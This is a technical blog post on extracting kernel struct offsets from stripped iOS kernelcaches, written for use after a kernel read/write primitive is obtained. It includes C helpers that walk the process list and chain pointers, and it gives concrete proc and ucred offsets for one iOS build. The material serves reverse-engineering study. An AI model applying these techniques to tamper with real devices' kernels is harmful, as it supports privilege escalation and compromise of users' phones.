
You Have a Kernel Read/Write. Not Enough! How to Extract Offsets from XNU Kernelcaches


Foreword

Opa334 recently shared a kernel read and write primitive similar to the one used in the DarkSword malware. It was the perfect occasion to get it running on one of my test devices and to get my hands dirty with kernel exploration. We always hear about kernel exploitation, but rarely get to walk through what it looks like in practice.

Once you have read and write primitives to the kernel, the first step is to read backward through memory until you find the magic number, i.e. the Mach-O header signature:

    uint64_t magic = early_kread64(kernel_base);
    // 0xfeedfacf (MH_MAGIC_64) followed by 0x0100000c (CPU_TYPE_ARM64)
    if (magic == 0x100000cfeedfacf) {
        printf("[DEBUG] Found Mach-O magic at 0x%llx!\n", kernel_base);
    }

Then you can compute the kernel slide and you are good to go.

I won't detail this, but feel free to check the blog post of MATTEYEUX on DarkSword.

Now the next difficulty is to find the offsets between this magic value and the kernel objects in memory. It is exactly what this post is about.


Introduction

Kernelcaches extracted from IPSW files come without symbols: just raw ARM64 code. Yet, the internal layout of every kernel data structure is recoverable if you know where to look.

Note: you can use blacktop/symbolicator to recover some symbols and make your life easier.

It reminds me of this sentence from J. Levin in the DisARM book:

[...] In fact, the whole premise of the command line tools I demonstrate is to avoid having to use a debugger.

I tried to push hard on that path...

This guide documents a repeatable methodology for extracting struct offsets from stripped kernelcaches. The techniques here were validated against iOS 16.7.12 (iPhone X, build 20H364) using Binary Ninja.

I deliberately chose not to use the Kernel Development Kit, to force myself to work directly from ARM assembly.


Prerequisites

  • A disassembler with decompiler support (Binary Ninja, IDA Pro + Hex-Rays, or Ghidra)
  • A decrypted kernelcache (I used ipsw for extraction)
  • The XNU open-source release for the closest matching version

Also, the pseudocode (the non-ARM snippets) that I share below has been modified and simplified for this post.


The Core Principle

The key insight behind this entire methodology is that functions like proc_pid(), vnode_mount(), or kauth_cred_getuid() are thin wrappers that each read a single field from a struct. Once decompiled, they directly reveal that field's offset.

A stripped kernelcache still retains the names of these exported functions.


Phase 1: Cross-Referencing with XNU Source

The XNU kernel source is partially open. While the iOS build may differ from the published source, the struct layouts are usually very close. Use the source as a map, not as ground truth.

  1. Identify the field name from the accessor function name (e.g., _proc_pid → p_pid)
  2. Find the struct definition in the XNU source (e.g., bsd/sys/proc_internal.h)
  3. Use the source to predict which fields exist and roughly where they are
  4. Verify each prediction against the actual binary

Struct definitions in XNU source

Struct      Header file
proc        bsd/sys/proc_internal.h
vnode       bsd/sys/vnode_internal.h
socket      bsd/sys/socketvar.h
ucred       bsd/sys/ucred.h
task        osfmk/kern/task.h
thread      osfmk/kern/thread.h
filedesc    bsd/sys/filedesc.h
fileproc    bsd/sys/file_internal.h
fileglob    bsd/sys/file_internal.h
mount       bsd/sys/mount_internal.h

Apple frequently adds, removes, or reorders fields between iOS versions. Never assume the open-source layout matches exactly. The source tells you what fields exist; the binary tells you where they are.

For example, proc_ro (a read-only split of proc fields) exists in iOS 15.2+ but is not in older XNU source releases. If you only read the source, you would miss this entirely.


Phase 2: Finding Anchor Points

Global variables like allproc, kernproc, and nprocs are stored in the __DATA segment. They are referenced by functions via adrp/ldr instruction pairs. Finding these gives you entry points into the kernel's data structures from a known address.

ARM64 uses page-relative addressing:

    adrp x8, 0xfffffff0078b7000   ; load page base
    ldr  x8, [x8, #0x728]         ; load from page + offset
    ; → effective address: 0xfffffff0078b7728

This is a load of the global variable at 0xfffffff0078b7728, which in the context of proc_iterate is allproc.

Kernel slide (KASLR)

All addresses in the static binary are pre-slide. At boot, the kernel is loaded at a random offset (the KASLR slide). On a live device, the actual addresses will be static_address + slide. The offsets between globals remain constant.
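In code, the slide arithmetic is a subtraction and an addition. This is only a sketch: the helper names are mine, and the static base you pass in has to come from your own kernelcache's Mach-O header.

```c
#include <assert.h>
#include <stdint.h>

/* slide = where the Mach-O header was found at runtime - where the static binary says it is */
uint64_t kaslr_slide(uint64_t runtime_base, uint64_t static_base)
{
    assert(runtime_base >= static_base);
    return runtime_base - static_base;
}

/* Turn an address read in the disassembler into its address on the live device. */
uint64_t slide_addr(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}
```

With a hypothetical static base of 0xfffffff007004000 and a hypothetical runtime base of 0xfffffff01c004000, the slide is 0x15000000, and a global at static address 0xfffffff0078b7728 would live at 0xfffffff01c8b7728.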


Phase 3: Use accessor functions

Search for functions whose names follow the pattern <struct>_<field> or <struct>_get<field>. These are almost always thin accessors.

How to recognize an accessor

An accessor function decompiles to essentially one operation:

    // _proc_pid at 0x5c892c
    return *(arg1 + 0x60);

Or in ARM64 assembly:

    ldr w0, [x0, #0x60]
    ret

That single load instruction tells you: struct proc has p_pid at offset +0x60, and it is a 32-bit integer because the instruction is ldr w0, not ldr x0.

For example, given a target struct, search the function list for its name:

Target struct    Search patterns
proc             proc_pid, proc_ppid, proc_ucred, proc_name, proc_task
vnode            vnode_vtype, vnode_mount, vnode_vid, vnode_fsnode, vnode_getname
ucred            kauth_cred_getuid, kauth_cred_getgid, kauth_cred_getruid
task             get_task_map, get_bsdtask_info, task_reference
socket           file_socket, soisconnecting, soisconnected
mount            vfs_flags, vfs_statfs

Example: Mapping struct ucred

Search for functions containing kauth_cred_get:

_kauth_cred_getuid   → return *(arg1 + 0x18)  →  cr_uid  at +0x18
_kauth_cred_getruid  → return *(arg1 + 0x1C)  →  cr_ruid at +0x1C
_kauth_cred_getsvuid → return *(arg1 + 0x20)  →  cr_svuid at +0x20
_kauth_cred_getgid   → return *(arg1 + 0x28)  →  cr_gid  at +0x28
_kauth_cred_getrgid  → return *(arg1 + 0x68)  →  cr_rgid at +0x68
_kauth_cred_getsvgid → return *(arg1 + 0x6C)  →  cr_svgid at +0x6C
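One way to keep such a map honest is to write it down as a padded C struct and let the compiler check every offset. This is a sketch for this specific build only: the struct name and the unmapped_* padding fields are mine, and the gaps are regions I have not mapped, not fields that exist under those names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Partial layout recovered from the kauth_cred_get* accessors (iOS 16.7.12). */
struct ucred_layout {
    uint8_t  unmapped_00[0x18];   /* not mapped yet */
    uint32_t cr_uid;              /* +0x18 */
    uint32_t cr_ruid;             /* +0x1c */
    uint32_t cr_svuid;            /* +0x20 */
    uint8_t  unmapped_24[0x04];   /* not mapped yet */
    uint32_t cr_gid;              /* +0x28 */
    uint8_t  unmapped_2c[0x3c];   /* not mapped yet */
    uint32_t cr_rgid;             /* +0x68 */
    uint32_t cr_svgid;            /* +0x6c */
};

/* Compile-time checks: a typo in a padding size breaks the build instead of the exploit. */
static_assert(offsetof(struct ucred_layout, cr_uid)   == 0x18, "cr_uid");
static_assert(offsetof(struct ucred_layout, cr_ruid)  == 0x1c, "cr_ruid");
static_assert(offsetof(struct ucred_layout, cr_svuid) == 0x20, "cr_svuid");
static_assert(offsetof(struct ucred_layout, cr_gid)   == 0x28, "cr_gid");
static_assert(offsetof(struct ucred_layout, cr_rgid)  == 0x68, "cr_rgid");
static_assert(offsetof(struct ucred_layout, cr_svgid) == 0x6c, "cr_svgid");
```

The struct stops at the last field I confirmed, so its size says nothing about the real size of ucred.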

Decompiler vs. disassembly

Decompilers sometimes introduce confusing array indexing notation. When the decompiler shows arg1[0x15], the actual offset depends on what type it infers for arg1. Always verify against the raw disassembly.

For example, arg1[0x15a] in decompilation might mean arg1 + 0x15a * sizeof(element). But the ARM64 instruction will show the real byte offset:

    ; 0x5c9a40
    add x0, x0, #0x579   ; This is the actual offset

When in doubt, read the assembly instructions: they are always the ground truth.
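The conversion itself is a single multiplication, but it is easy to get wrong when the decompiler silently changes its mind about the element type. A tiny helper (the name is mine) makes the assumption explicit:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Byte offset hidden behind a decompiler expression like arg1[index],
 * given the element size the decompiler inferred for arg1. */
size_t index_to_byte_offset(size_t index, size_t elem_size)
{
    assert(elem_size > 0);
    return index * elem_size;
}
```

So arg1[0x15] is byte offset 0xa8 if arg1 was typed as a uint64_t pointer, but 0x54 if it was typed as a uint32_t pointer.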


Phase 4: Iterator and Constructor Functions

When accessor functions do not exist for a field (many internal fields are never exported), look at functions that iterate or construct instances of the struct. These functions touch many fields and reveal the overall layout.

The Iterator Pattern

Functions named *_iterate, *_foreach, or *_walk traverse linked lists of kernel objects. They reveal:

  • The global head pointer of the list (a kernel global variable)
  • The list entry offset within the struct. It is often +0x00 for the primary list, but a struct can have multiple list entries at different offsets (e.g. proc.p_list at +0x00 vs proc.p_hash at +0xA0)
  • The count variable (for instance nprocs, in proc_iterate)
  • Various field accesses used for filtering

Example: proc_iterate

This single function revealed:

What               How                                                               Value
allproc global     First data reference loaded as list head                          0xfffffff0078b7728
zombproc global    Second list head (conditional on flags)                           0xfffffff0078b7730
nprocs global      Loop bound variable                                               0xfffffff0078b7d00
p_list.le_next     i = *i (following the list)                                       +0x00
p_pid              Stored into pidlist array                                         +0x60
p_stat             Compared against 1 (SIDL: skips processes still being forked)     +0x64
p_listflag         Reference count manipulation                                      +0x464
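With just the list head, p_list.le_next and p_pid, you can already walk the process list yourself. The sketch below assumes you have 64-bit and 32-bit read primitives (the function-pointer types and the demo_* readers are mine, the latter only exist so the code runs on a desktop), and it ignores locking entirely, so the list may change under you on a live device.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offsets from the proc_iterate table (iOS 16.7.12, iPhone X). */
#define OFF_P_LIST_LE_NEXT 0x00
#define OFF_P_PID          0x60

/* Hypothetical read primitives: anything that can read kernel memory. */
typedef uint64_t (*kread64_fn)(uint64_t kaddr);
typedef uint32_t (*kread32_fn)(uint64_t kaddr);

/* Walk the list whose head is stored at allproc_addr (already slid).
 * Returns the proc address whose p_pid matches, or 0 if not found.
 * max_procs bounds the walk in case the list is corrupted or racing. */
uint64_t find_proc_by_pid(kread64_fn r64, kread32_fn r32,
                          uint64_t allproc_addr, uint32_t pid, size_t max_procs)
{
    assert(r64 != NULL && r32 != NULL);
    uint64_t proc = r64(allproc_addr);              /* list head */
    for (size_t i = 0; proc != 0 && i < max_procs; i++) {
        if (r32(proc + OFF_P_PID) == pid)
            return proc;
        proc = r64(proc + OFF_P_LIST_LE_NEXT);      /* i = *i */
    }
    return 0;
}

/* Desktop stand-ins: head at 0x1000 -> proc 0x1100 (pid 42) -> proc 0x1200 (pid 1) -> NULL */
uint64_t demo_r64(uint64_t a)
{
    switch (a) {
    case 0x1000: return 0x1100;
    case 0x1100: return 0x1200;
    default:     return 0;
    }
}

uint32_t demo_r32(uint64_t a)
{
    switch (a) {
    case 0x1100 + OFF_P_PID: return 42;
    case 0x1200 + OFF_P_PID: return 1;
    default:                 return 0;
    }
}
```

On a device, you would pass your real primitives and the slid address of allproc instead of the demo readers.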

The Constructor Pattern

Functions named *create*, *init*, or *alloc* initialize struct fields. They often set fields sequentially, revealing the struct layout in order.

For instance, socreate_internal (the socket creation routine) revealed over 20 struct fields, simply by tracing the sequential stores to the newly allocated socket.

    // x21 = newly allocated socket
    *(x21 + 0x18)  = protosw;           // so_proto
    *(x21 + 0x1e0) = kauth_cred;        // so_cred
    *(x21 + 0x1e4) = proc_pid(p);       // so_last_pid
    *(x21 + 0x1e8) = proc_uniqueid(p);  // so_last_upid
    *(x21 + 0x288) = tpidr_el1;         // so_background_thread

What to look for in constructors

  • Calls to other accessor functions (e.g., proc_pid()) whose return value is stored
  • memcpy calls that reveal embedded sub-structures
  • str xzr (storing zero) to initialize pointer fields

Phase 5: Syscall Implementations (The Deep Dive)

When neither accessors nor iterators exist for a field, look at the syscall implementations that operate on the struct. Syscalls are the boundary between userspace and kernel space; they must read and write kernel structs to do their work.

Naming conventions

XNU syscall implementations follow the pattern sys_<name> or just <name> for older BSD syscalls:

Syscall      Function name    Reveals
chdir(2)     sys_chdir        filedesc.fd_cdir offset
chroot(2)    chroot           filedesc.fd_rdir offset, chroot flag
open(2)      vn_open_auth     fileproc/fileglob chain
fchdir(2)    sys_fchdir       filedesc locking pattern

We could for example try to access some fields of proc via sys_chdir.

The chdir syscall must update the current working directory. Decompiling it reveals:

    IORWLockWrite(proc + 0x128);             // fd_rw_lock
    old = *(proc + 0x118);                   // fd_cdir (old value)
    *(proc + 0x118) = new_vnode;             // fd_cdir = new directory
    lck_rw_unlock_exclusive(proc + 0x128);
    if (old != NULL)
        vnode_rele(old);

This gives us two offsets and one structural fact from a single function:

  • proc + 0x118 = fd_cdir
  • proc + 0x128 = fd_rw_lock
  • And confirms the filedesc is inline in the proc (no intermediate pointer)

The inline vs. pointer question

A critical question when mapping any struct: is sub-struct X a pointer to a separate allocation, or is it embedded inline?

The answer comes from how the code accesses it. If you see:

    // Pointer to separate struct:
    fd = *(proc + SOME_OFFSET);   // load a pointer
    cdir = *(fd + 0x18);          // dereference through it

    // Inline (embedded):
    cdir = *(proc + 0x118);       // direct access, no intermediate load

If there is no intermediate pointer load, the sub-struct is inline. This is exactly what we found for filedesc inside proc: the fields are at direct offsets from the proc base.


Phase 6: Zone ID Validation (Identifying Protected Structures)

zone_require() and zone_id_require_ro() are used to validate that pointers belong to the correct memory zone. These checks reveal what zone a struct lives in and whether it is read-only.

Reading zone validation

When you see code like this:

    // Inside _proc_ucred:
    x1 = *(arg1 + 0x18);               // load proc_ro pointer
    zone_id_require_ro_panic(5, x1);   // validate it belongs to zone #5

Then we can deduce:

  • proc + 0x18 is a pointer to another struct
  • That struct lives in zone #5
  • Zone #5 is a read-only zone (the _ro suffix)

Zone ID mapping

By collecting all zone_id_require_ro_panic calls across the kernelcache, you can build a complete map of protected zones:

Zone ID    Struct       Protection
3          thread_ro    read-only
5          proc_ro      read-only
7          ucred        read-only
0x17       proc         Regular zalloc (with zone_require)

Understanding which structures are in read-only zones tells you about the kernel's security architecture. Fields that Apple moved into proc_ro are protected and cannot be modified even with a kernel read/write primitive.


Phase 7: Following Pointer Chains (Graph Traversal)

Individual functions rarely traverse more than one or two pointer hops. But by combining offsets discovered in different functions, you can build paths between objects that have no direct accessor.

For example, there is no socket_get_proc() in the KPI: you cannot find the owning process of a socket with a single function search. But the path exists if you chain discoveries from earlier phases:

  • From socreate_internal (Phase 4): socket + 0x288 stores the creating thread (tpidr_el1)
  • From _current_proc (Phase 3): thread + 0x350 → thread_ro, then thread_ro + 0x10 → proc

socreate_internal        _current_proc         _proc_pid
  found in Phase 4         found in Phase 3      found in Phase 3
        │                        │                     │
        ▼                        ▼                     ▼
  ┌──────────┐  +0x288  ┌────────────┐ +0x350  ┌────────────┐ +0x10  ┌──────────┐ +0x60
  │  socket  │ ───────→ │   thread   │ ──────→ │ thread_ro  │ ─────→ │   proc   │ ─────→ p_pid
  └──────────┘          └────────────┘         └────────────┘        └──────────┘
                         (tpidr_el1)             (zone RO #3)

Neither function knows about the other. But combining them gives you a three-hop path from any socket to its owning process, something you could never find by searching function names alone.
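Once the offsets are known, the traversal itself is a loop over pointer loads. The sketch below follows the socket → thread → thread_ro → proc path and reads p_pid at the end. The read-primitive types, function names and demo_* readers are mine (the demo readers fake four objects so the code runs on a desktop), and the offsets are only valid for this build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offsets collected in the earlier phases (iOS 16.7.12, iPhone X). */
#define OFF_SOCKET_THREAD   0x288   /* socket -> creating thread */
#define OFF_THREAD_RO       0x350   /* thread -> thread_ro       */
#define OFF_THREAD_RO_PROC  0x10    /* thread_ro -> proc         */
#define OFF_P_PID           0x60    /* proc.p_pid                */

typedef uint64_t (*kread64_fn)(uint64_t kaddr);
typedef uint32_t (*kread32_fn)(uint64_t kaddr);

/* Follow n pointer hops: at each hop, load the pointer stored at cur + offsets[i].
 * Stops early and returns 0 if a NULL pointer is met. */
uint64_t follow_chain(kread64_fn r64, uint64_t start, const uint32_t *offsets, size_t n)
{
    assert(r64 != NULL && offsets != NULL);
    uint64_t cur = start;
    for (size_t i = 0; i < n && cur != 0; i++)
        cur = r64(cur + offsets[i]);
    return cur;
}

/* Returns the pid reached from a socket address, or -1 if the chain is broken. */
int64_t socket_to_pid(kread64_fn r64, kread32_fn r32, uint64_t socket)
{
    static const uint32_t path[] = { OFF_SOCKET_THREAD, OFF_THREAD_RO, OFF_THREAD_RO_PROC };
    assert(r32 != NULL);
    uint64_t proc = follow_chain(r64, socket, path, sizeof path / sizeof path[0]);
    return proc ? (int64_t)r32(proc + OFF_P_PID) : -1;
}

/* Desktop stand-ins: socket 0x1000 -> thread 0x2000 -> thread_ro 0x3000 -> proc 0x4000 (pid 1234) */
uint64_t demo_r64(uint64_t a)
{
    switch (a) {
    case 0x1000 + OFF_SOCKET_THREAD:  return 0x2000;
    case 0x2000 + OFF_THREAD_RO:      return 0x3000;
    case 0x3000 + OFF_THREAD_RO_PROC: return 0x4000;
    default:                          return 0;
    }
}

uint32_t demo_r32(uint64_t a)
{
    return a == 0x4000 + OFF_P_PID ? 1234 : 0;
}
```

Keeping the path as a plain array of offsets means a new chain is one more array, not one more function.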

This is where the work becomes cumulative: every offset you confirmed in Phases 1–6 is a building block. The more you have, the more paths you can construct.


Phase 8: Hash Tables and Complex Data Structures

Some kernel lookups use hash tables instead of linked lists. The hash function and table structure can be recovered from the lookup function.

Example: PID hash table from _proc_find

_proc_find takes a PID and returns the corresponding proc. Decompiling it reveals:

  1. A multiplicative hash function applied to the PID
  2. A global hash table pointer at a known address
  3. A mask derived from table metadata
  4. A chain walk through the collision list, comparing PIDs

The hash entry lives at proc + 0xA0, which means the proc struct has a LIST_ENTRY at that offset for chaining in the hash table. The PID comparison happens at hash_entry - 0xA0 + 0x60, confirming p_pid at +0x60 from another angle.
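This is the classic "container of" arithmetic: the chain links point at the embedded list entry, not at the start of the proc. A minimal sketch of that adjustment, with helper names of my own and the two offsets from this build:

```c
#include <assert.h>
#include <stdint.h>

#define OFF_P_HASH 0xA0   /* proc.p_hash, the hash chain entry */
#define OFF_P_PID  0x60   /* proc.p_pid */

/* A hash chain pointer addresses proc + 0xA0; step back to the proc base. */
uint64_t proc_from_hash_entry(uint64_t hash_entry)
{
    assert(hash_entry >= OFF_P_HASH);
    return hash_entry - OFF_P_HASH;
}

/* Address the lookup compares against: hash_entry - 0xA0 + 0x60. */
uint64_t pid_addr_from_hash_entry(uint64_t hash_entry)
{
    return proc_from_hash_entry(hash_entry) + OFF_P_PID;
}
```

For a hypothetical chain pointer 0xffffffe0001000a0, the proc base is 0xffffffe000100000 and its p_pid is read from 0xffffffe000100060.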


Practical Tips

Function clusters reveal struct regions

If you find proc_pid at +0x60, proc_ppid at +0x20, and proc_pgrpid at +0x28, you know the PID-related fields are clustered in the +0x20–0x68 region. This helps you predict where other related fields might be, and focus your search.

Size hints from zalloc_ro_mut

When zalloc_ro_mut(zone_id, ptr, offset, src, size) is called, the size parameter is the number of bytes being written. When the call writes the whole struct (offset 0), that gives you the total size of the read-only struct. For example, proc_ro is 0x80 bytes.

ARM64 instruction cheat sheet for offset extraction

Instruction                               What it tells you
ldr x0, [x1, #0x60]                       64-bit load from offset 0x60
ldr w0, [x1, #0x60]                       32-bit load from offset 0x60
ldrh w0, [x1, #0x70]                      16-bit load from offset 0x70
ldrb w0, [x1, #0x64]                      8-bit load from offset 0x64
str x2, [x1, #0x18]                       64-bit store at offset 0x18
add x0, x1, #0x579                        Compute address at offset 0x579 (often for strings/arrays)
stp x2, x3, [x1, #0x50]                   Store pair: 64-bit values at +0x50 and +0x58
adrp x8, PAGE then ldr x8, [x8, #OFF]     Global variable load at PAGE+OFF
mrs x0, tpidr_el1                         Load current thread pointer

Field size from instruction width

The ARM64 instruction tells you the field size:

  • ldr x / str x → 8 bytes (pointer, uint64)
  • ldr w / str w → 4 bytes (int32, uint32, pid_t)
  • ldrh / strh → 2 bytes (uint16, short)
  • ldrb / strb → 1 byte (uint8, char, bool)

References

  • Jonathan Levin, *OS Internals (volumes I–III): the definitive reference on XNU internals
  • Apple XNU source — opensource.apple.com